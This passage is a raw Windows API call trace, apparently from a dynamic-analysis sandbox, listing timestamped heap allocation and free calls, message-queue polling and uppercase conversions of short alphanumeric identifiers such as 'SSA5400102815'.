(HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0266.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0266.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0266.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0266.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0266.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0266.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0266.765] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0266.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0266.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0266.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.767] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.767] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.768] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.768] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.768] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.769] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0266.769] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.769] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.770] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.770] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.770] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0266.771] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.772] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0266.772] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.772] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.772] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.772] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.773] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0266.773] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.774] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.774] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.775] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.775] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.775] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.775] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.776] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.792] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.794] 